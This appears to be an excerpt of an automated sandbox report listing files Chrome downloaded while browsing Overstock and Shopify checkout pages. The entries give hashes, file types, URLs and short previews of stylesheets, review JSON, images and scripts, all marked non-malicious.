                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (4413)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):4414
                                                                                                                                                          Entropy (8bit):5.085793650664478
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:C404893E8DB5BC1C3650EC1FCF674046
                                                                                                                                                          SHA1:B12072A0A3A5F82DECFBDA8F98D582B569EDD157
                                                                                                                                                          SHA-256:DAAA0C72017B3EB7959CFF3801DEFB82C705B9D63827F7F0A2965E160DF70941
                                                                                                                                                          SHA-512:4ABD297D690ADA1616C3FFC8663E38A2A76CAB56B55FC28B0FB211918EF51FDE11EFA2B5CEEB1AD05B32295F435731BBF51074EFA0C3F1613F07FA0C5DC44878
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/OnePage.BL1uXB7_.css
                                                                                                                                                          Preview:.bAwqP{word-break:break-word}.sYMP2{line-height:1}.sYMP2:not(.aPplN):hover{background-color:var(--x-default-color-background-subdued)}.N5SeL{border-radius:var( --x-primary-button-border-radius, var(--x-global-border-radius, var(--x-border-radius-base)) )}.fdTMm{display:inline-block}[dir=ltr] .ekZTm{padding-left:var(--x-spacing-small-400)}[dir=rtl] .ekZTm,[dir=ltr] .ekZTm{padding-right:var(--x-spacing-small-400)}[dir=rtl] .ekZTm{padding-left:var(--x-spacing-small-400)}[dir=ltr] .UmHzB{padding-left:var(--x-spacing-small-300)}[dir=rtl] .UmHzB,[dir=ltr] .UmHzB{padding-right:var(--x-spacing-small-300)}[dir=rtl] .UmHzB{padding-left:var(--x-spacing-small-300)}[dir=ltr] .JPhUL{padding-left:var(--x-spacing-base)}[dir=rtl] .JPhUL,[dir=ltr] .JPhUL{padding-right:var(--x-spacing-base)}[dir=rtl] .JPhUL{padding-left:var(--x-spacing-base)}._7k6aq{padding-top:var(--x-spacing-small-400);padding-bottom:var(--x-spacing-small-400)}.CmqN5{padding-top:var(--x-spacing-small-300);padding-bottom:var(--x-spacing
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):147
                                                                                                                                                          Entropy (8bit):4.694129593090887
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:324F64D4B85818E46367A75543769B78
                                                                                                                                                          SHA1:F6C772C4821421845C36C3F07355397D95FFC63A
                                                                                                                                                          SHA-256:F9A8B47FF0009E7004470C9076777F4801C31D66A097F60D5AA502CC50E525F3
                                                                                                                                                          SHA-512:3773AFB2E1D0DC19FC30C52F05587452A91AD14040C2D286DDFD17BAE559D0FAA69B053567E16C0BB1D81FF8E5A7201C9574C63A3B38C10997B78E27A4BAC305
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://display.powerreviews.com/m/1280018588/l/en_US/product/40449660/snippet?apikey=0ce15d13-67ca-47dd-8c72-1d5e4694ada3&_noconfig=true
                                                                                                                                                          Preview:{"name":"snippet","results":[{"page_id":"40449660","rollup":{"average_rating":4.57,"rating_count":322,"review_count":322,"answered_questions":0}}]}
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):147
                                                                                                                                                          Entropy (8bit):4.716205188314264
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:E108C4D36DF48D360D75F90E829372A1
                                                                                                                                                          SHA1:AB76A24971896B84D858776450509F65EAC6BC55
                                                                                                                                                          SHA-256:7F79FEB1BD64E322BA31D91477D810F32772008CE00CB4C3F635D97E37CA1EDD
                                                                                                                                                          SHA-512:765D360C241ADC0863B3BB7F3605E19C2D8D21537E7AD0687DE9F5F20539CDEBC12AC4B8C8F094E7F857C72A5E419D27278055A9D2834A0B022FD2DB41217C2D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://display.powerreviews.com/m/1280018588/l/en_US/product/25359005/snippet?apikey=0ce15d13-67ca-47dd-8c72-1d5e4694ada3&_noconfig=true
                                                                                                                                                          Preview:{"name":"snippet","results":[{"page_id":"25359005","rollup":{"average_rating":4.47,"rating_count":188,"review_count":188,"answered_questions":0}}]}
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):32
                                                                                                                                                          Entropy (8bit):4.054229296672174
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:5BB011FCC873A9AE56F0A4D5988AF09E
                                                                                                                                                          SHA1:C6200E26563E81628E67EC1E9685C0994C351DBD
                                                                                                                                                          SHA-256:874E4A927E06795573365A0E54EE080F0D92FDF00617FD476F7D0E53EE8BDFB5
                                                                                                                                                          SHA-512:35422413017DC267A9EB89BE9B13724B7F2F0D209E596007684B777CEB1D1DF0FD2963D489C911C2D4BBCA57759B2CC924A4BEC6EC3864F959EE964F15913A8C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAnTBeBq957POxIFDQPwgdo=?alt=proto
                                                                                                                                                          Preview:ChQKEg0D8IHaGgQICRgBGgUImgEYAg==
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):6852
                                                                                                                                                          Entropy (8bit):7.82417458729163
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:C2481CD9E22B87DD8F9213EA603696C3
                                                                                                                                                          SHA1:71E5E34B1EC18917FA16318D4E130CD6F31128F9
                                                                                                                                                          SHA-256:A931A3C53002461F1983EE2706410E85BB4490E310807905FF0651F75A5349FE
                                                                                                                                                          SHA-512:616205C19097C20BA170C7089A8E5BCCB286E864A9266852C059AE77E2F54EC91DB7A19DA6061B5112CB6147E17F916B883772BBD6C4B4E349FC042663202E54
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/Palace-Imports-100_25-Solid-Wood-Set-of-4-Small-Shelves-for-Kyle-Wardrobe-Armoires.jpg?v=1717154154&width=320
                                                                                                                                                          Preview:RIFF....WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 ,....r...*@.@.>9..D"!..{,p ....p.....3.....?..6..]...b.........?.....h....w............M.......P.....f....x?..=.........o...3.......O..R.w..._..~e.r...'..s.#......i..._...........?L.Z..._...O....................G%A.....$..J.>.W..H%...|..'.J9*...\O. .rT......A(.#.5q?$..4......sA.6U....^.(..|EX.C}.i.R..+..+:...k.....'.yY.J.......0...Q,C..%.S..J.n..Z|9H...f/{..V....y.n....9GV..'.....Q.%....../V(a..w.f.....>.b.!.......N.6u&..[}?C.l/.*0.^....4.%W.BkL.4.....<..~..K...U..:%....?...!H.J/....yD...._..`..%.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 320 x 320, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):51261
                                                                                                                                                          Entropy (8bit):7.982365851217061
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:A89DF3C3EF612D2989C21D430F9099BB
                                                                                                                                                          SHA1:442F407136B752AC2C77C6DCA3544F2BAD4C17E1
                                                                                                                                                          SHA-256:88EFD31F9013C7A78925009BB00CAA2C5E289414025E5DE4B09309E581BCC2CE
                                                                                                                                                          SHA-512:6120DAB2E87931049D870973D44868ACB9BDB3C68A57DEE2067A00841EB70C38799846F487ABD45349A4077B9EF7A4729AE7FE0FE9FD782235C4EB252D6E1CB2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:.PNG........IHDR...@...@............iCCPicc....c``\...[.$....WR........~...A...A..21...1 ...'.v...D_....@..LI-Nf``......\PT...........```.)...b``....!...;...V..............NBbC....d..Ld.$...A.R.....O2'.N....&`/.(m..Qs....$7......U...g..._{..K...KR+J@.....@a..6...E..._...' .f20loe`....SY........<...M...Ft....eXIfII*...........................V...........^...(.......................i.......f.......x2......x2................0210....................0100....................@...........@.......n.1.....pHYs...%...%.IR$... .IDATx..w|....ofv..ncL..B..^L.%$..I..+..c..M......1I.wH(?:...l....~..7....,.....b!.vgwg..s.....`C)..+....<@u.7B.. .......@..(.....+_)....!.R.....q.@.+o...\."..l.p.4..,o...6a.B...T...............!D+...1...........F..o@!.......@..g...Q.kS`.0..` .;.P.~..c#@.?T....Sw.}J.. ....t.X..=.a.....a[..N.-.4.+.....R.s....@.R.........`..[v....e....6..5_..#..".z...*?...[B...R %.q....>Q=.......".e).(..I...n7*.L&w.n.>...."x..X5Z.. ~..W).!....... m.B...n....`...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (8298), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):8298
                                                                                                                                                          Entropy (8bit):5.180172095910542
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:125C7F6C7E3F3B32CA1A15AFBBC6935E
                                                                                                                                                          SHA1:7066F246643259315FB97D3E85F48F4D471AB27E
                                                                                                                                                          SHA-256:61FA9E0A912C675E178777D2B27F6CBD482F8912A6B0AA31FA3515985A8CD626
                                                                                                                                                          SHA-512:15768054FE3D5EFEAD6DD96F73D54F3A935DDC246A8D727960371C543CFF923162C7530B8F47C4757F0A1028F9C0961DEE5D9D2FA983AE93434640C32F4A3020
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shopifycloud/shopify/assets/shop_events_listener-61fa9e0a912c675e178777d2b27f6cbd482f8912a6b0aa31fa3515985a8cd626.js
                                                                                                                                                          Preview:!function(){var e=function(e){var t={exports:{}};return e.call(t.exports,t,t.exports),t.exports},t=function(){function e(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,r.key,r)}}return function(t,n,r){return n&&e(t.prototype,n),r&&e(t,r),t}}(),n=function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")},r=function(e){if(Array.isArray(e)){for(var t=0,n=Array(e.length);t<e.length;t++)n[t]=e[t];return n}return Array.from(e)};e((function(e,a){"use strict";function o(e,t){if(e.length!=t.length)throw Error("Payload body and response have different number of items");e.forEach((function(e,n){var r=1;try{r=parseInt(t[n].quantity,10)||1}catch(e){console&&console.warn&&console.warn("[shop_events_listener] Error in handleBulkItemCartAddResponse: "+e.message)}s(e,r)}))}function i(e,t){for(var n=new Array(t),r=0;r<t;r++)n[r]={};var a=!0,o=!1,i=void 0;try{for(var c,s=dec
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (1115)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1223
                                                                                                                                                          Entropy (8bit):5.078176850620321
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:C3272EF6B6BBBFBEA157F034B4BC47EF
                                                                                                                                                          SHA1:8C95E76D79349D8A6B7CF8CB6B645F2680293B55
                                                                                                                                                          SHA-256:0062ED1DAC142928F4A048D2AEBCB7122733FB190B9232026428340E5A038056
                                                                                                                                                          SHA-512:FB7DA762E2C9B1EAACB2E94F0D0FAE4C9398B932EA6CB616E1DFAB031D1A60D36208EB718BE53648FF8C86116C3DC1BD9D3C28E52A33950794C3C2C80233B79F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/t/211/assets/featured-collection.css?v=64892234005846914921729142870
                                                                                                                                                          Preview:@media (min-width: 769px){.featured-collection-info--carousel{margin-bottom:10px}.featured-collection-info{flex-basis:280px}.featured-collection-info+.container{max-width:calc(100% - 280px)}.featured-collection-info+.carousel{max-width:calc(100% - 280px)}.featured-collection-info+.carousel .slider{width:100%;margin-inline-start:0}.featured-collection-container{max-width:calc(var(--page-width, 1320px) + var(--gutter) * 2);padding-inline-start:var(--gutter)}.featured-collection--sticky{position:-webkit-sticky;position:sticky;top:var(--header-end-padded, 0);transition:top .3s}.featured-collection--sticky-fill{min-height:var(--card--product-height, auto)}}@media (min-width: 1024px){.featured-collection-info{flex-basis:350px;margin-inline-end:var(--gutter-md, 32px)}.featured-collection-info+.container{max-width:calc((100% - 350px) - var(--gutter-md, 32px));padding:0}.featured-collection-info+.carousel{max-width:calc((100% - 350px) - var(--gutter-md, 32px))}.featured-collection-container{pad
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (65447)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):89501
                                                                                                                                                          Entropy (8bit):5.289893677458563
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                                                                          Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):83
                                                                                                                                                          Entropy (8bit):5.0289819083000395
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:0951B3AE1D7C646591AF0A4B13F356EF
                                                                                                                                                          SHA1:9972523ED2314A487131F39E48010C02A905B139
                                                                                                                                                          SHA-256:6AF0272E00008D3EB784E33F1CAB4D3FDAABE262F6078FF1DD84FD456D21C2A3
                                                                                                                                                          SHA-512:1F882A83422D5AE1293BDB6A7BE1A459B1DC4EB6F2EED412C046C15E09BD3097B57C5ABEC71C0DB6B44A771A86220444495591331F5FD25E90542783E2F632DE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/Section.sQehCocD.css
                                                                                                                                                          Preview:.WPQk2{color:var(--x-default-color-accent)}.qReyn>button{display:block;width:100%}.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 1200 x 189, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):237275
                                                                                                                                                          Entropy (8bit):7.9961309591098
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:31536919639208642C6E4356F419B38E
                                                                                                                                                          SHA1:E34E253AB8AF907B8811CDF5EFECD783B474E160
                                                                                                                                                          SHA-256:BF1D296D6E10FFFDF6186CCF0B036162462B7D9C5899C2E9126C9FC8D6E337C8
                                                                                                                                                          SHA-512:9076D2A1B4A8DA2F977B1EB348BEC08B085753A2F32B85EB101BF44C06B40180C2A5A2CDCEA2547C4F1E6744FE5113F6AF4D49E51FE541787CA9CEF0A35185E4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:.PNG........IHDR.....................iCCPicc....c``\...[.$....WR........~...A...A..21...1 ...'.v...D_....@..LI-Nf``......\PT...........```.)...b``....!...;...V..............NBbC....d..Ld.$...A.R.....O2'.N....&`/.(m..Qs....$7......U...g..._{..K...KR+J@.....@a..6...E..._...' .f20loe`....SY........<...M...Ft....eXIfII*...........................V...........^...(.......................i.......f...............................0210....................0100........................................i8.....pHYs.........&.:4.. .IDATx..K.m[v.......{.9..pR~bY.T...$..$.yX.6.t...$^.H.Ht....D..].t...."hD hFX..R..\.{.{..c.9h.5...9...9.\.?..{..c.1...o..........._..b....s~.'..fs...Y^g....w...%w......R.....A._t.v.^.....b........h..wQx}.<R.&....,.3...3..f=.D.5"..:g.*\..w7..~..r.V^...._.G.7.kt.8.-....~...B...9W./c.=Oen.%-G..T.B...A.6.e......r...H..uq..s...^y...q}..X|..R.:.f.......}?..~.Q..s..X...z.jn...cLj.z.-z4.....<o..X...~..z..Y;...[..wH.....@..`.y....}?.\k.a...f.H8.....x
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):14874
                                                                                                                                                          Entropy (8bit):7.946918271081834
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:3A569348603A985074E9AA863ECA99E9
                                                                                                                                                          SHA1:6E4A3D0C6B3970E62CA017F13D3827DC71928AE9
                                                                                                                                                          SHA-256:75B2D8F4D4D4ECB956BA80B56799A4874DCA552D43F984493CBE1E616BAA25F7
                                                                                                                                                          SHA-512:CA4E2EA647C63F5970994100FA8198471CAB209452BA9EC9E13207B9E222AE1ECA7F82B777FCB635B4D9FD0F45099030A475C0CA8B5E427EFD3C7B99AEBFF26D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/collections/Auriya-14k-Gold-1ctw-Oval-Moissanite-Halo-Diamond-Engagement-Ring-1-5ctw.jpg?v=1710950215&width=320
                                                                                                                                                          Preview:RIFF.:..WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .7.......*@.@.>9..D"!.$..)...cn.6[....D.]...-."=..g_..~...#.....<........3....}....l.Y..~........'......._............y.....A.......?.........@?.z.vu./.G...........6.w.?s.C.G..._.O.O,.......w......w.....}..w..../......?.G......7.i......!?y..........._..I.....!...'.o........=...........}.?..j.........F..09....Fc.....).Y.....p..r.M..X.;...-.2..Z5WM....B......].kW...)...;....KT.....6;..C.M.....*.........v.Zih......c..?... I..<..JU$~o_..........-.].?...w...........r...QW..a{.X......r.G{.z.<E...z...Oz.a..c.<~
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):147
                                                                                                                                                          Entropy (8bit):4.691649810937143
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:F7E77BE0082F647F0567E6D9A6828852
                                                                                                                                                          SHA1:158C0E2CE696396C076370671A54117CD4C293CA
                                                                                                                                                          SHA-256:213D2CF65BD62CA7F6A7A9BD994F8F20A407C673A6E8640C9101714789CDEE77
                                                                                                                                                          SHA-512:646A7F2DE7DBC9665C3BFB1FDF38B54AFE1C445E42EF31C660DCE823177A8F08D12F2E960E2EC3844459D2940EAE584297DB2C0BDA7C154A2D23F32E2968D7A7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:{"name":"snippet","results":[{"page_id":"20882501","rollup":{"average_rating":4.67,"rating_count":105,"review_count":105,"answered_questions":0}}]}
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):145
                                                                                                                                                          Entropy (8bit):4.656981093387952
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:FD14CD0BC47FBEBE5A15DD60F8F4DFFC
                                                                                                                                                          SHA1:44A9B27ED96F229014F0A866BB4D61666B4412FB
                                                                                                                                                          SHA-256:2B4BA2E0F1AC5952F6EC69C9C50C60B9C1D690E9DD26E2CEF7FC20297FBF490D
                                                                                                                                                          SHA-512:8E60F6B792933B5268098CE2B75C81DC5611F8BFA739496C5C6792BB4323F75E70E06D4986C480CF11E3951D4A622B83B99C7EDD60F088B9E355BA75B30A163B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:{"name":"snippet","results":[{"page_id":"35931979","rollup":{"average_rating":4.89,"rating_count":19,"review_count":19,"answered_questions":0}}]}
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):42
                                                                                                                                                          Entropy (8bit):2.9881439641616536
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                          SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                          SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                          SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):20405
                                                                                                                                                          Entropy (8bit):7.938010604921575
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:DC0294E7D4A6857E3B8CBFE6F6752139
                                                                                                                                                          SHA1:BBCD4B3EF8DDC57E8F8A65F2846A853BE6960B52
                                                                                                                                                          SHA-256:1967879295CA9C166BAEE0EFB9DB6175EA9299EBB34174A3BDA8D88D0648E513
                                                                                                                                                          SHA-512:7C25EFAE18D86EE51957683F58E46B7AB8E1A0A9176E6215CDE1D355CAD82385E02EEB93DC6678ABC1A8E57268CA8A9C209716933EF963F1269888801EC41469
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@...................................................................................^i.8*Y9xK:Q....a.....@A.Q.P...C....4.;G".!.0. ...40....!.a.).. .....!.Q.N.....TA...KH. ..F.....'..... .h..!.....H.........M...J...!.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):149
                                                                                                                                                          Entropy (8bit):4.696856040523153
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:6EFB241445621F361A73D233BD137E51
                                                                                                                                                          SHA1:E0B18C290DCBDA0BFCA2371D0B02AE5A52EE8C34
                                                                                                                                                          SHA-256:1DD6DB8C52AF6C04E08A5BCDA9BB533BA26BEE1F6978A6C867AB1FD637FDCE3A
                                                                                                                                                          SHA-512:BE985722E09D506EBCBB8339D14BBB3C09B224175FF1D9693A68AA601AEAFDE106E6B08DDD5DEB2D8DEC004FB1EEA6D85FA131B768B5ABC56CAAEEFA398DEC95
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://display.powerreviews.com/m/1280018588/l/en_US/product/40487780/snippet?apikey=0ce15d13-67ca-47dd-8c72-1d5e4694ada3&_noconfig=true
                                                                                                                                                          Preview:{"name":"snippet","results":[{"page_id":"40487780","rollup":{"average_rating":4.56,"rating_count":1175,"review_count":1175,"answered_questions":0}}]}
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):40820
                                                                                                                                                          Entropy (8bit):7.964418461465206
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:48BBB261B7F961AE524EBC796BD7AE83
                                                                                                                                                          SHA1:ECFA52160B122BE98A08E9999885434000CF3BA8
                                                                                                                                                          SHA-256:D961CE04D0D21DDEC72DC659A43FAD53471C084484D008200193E449ADDACCCF
                                                                                                                                                          SHA-512:743F93CCA265B598D0FC1B000A618C6C89A25E9AFA4664884E82EEE846E401E0AA99C1C7D8ED348AA7BBDFE6AEA5B5997DAC0E2474986C142AC4CE96E4F981D0
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@.....................................................................................6...-,...J.k....?.....x>W6.i.....F;...Ei>..}..\.^.l.-o'.~....OF^....q>Q>8.BevM......t...........E..$D..7.._..@Q.._G.....h.y=
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):13517
                                                                                                                                                          Entropy (8bit):7.7983910205950195
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:432C54F87B1F3A2F56681438F53D6354
                                                                                                                                                          SHA1:907D34C5BA2A9169B665BBAF33D8347FBE517CAF
                                                                                                                                                          SHA-256:AE862DC42ED3954F6EC20C3C62E662D5832A00BA4F440B23CC441666620C5F4B
                                                                                                                                                          SHA-512:27C9AA090BE0AA417E9C1B52A5635FABED283627658EB7CA5B494342D5434579ABFBDA1B1E0BB3A0B877E39B7A086B8DC23C20ABD955ECBCADBC1C1C09DDDF51
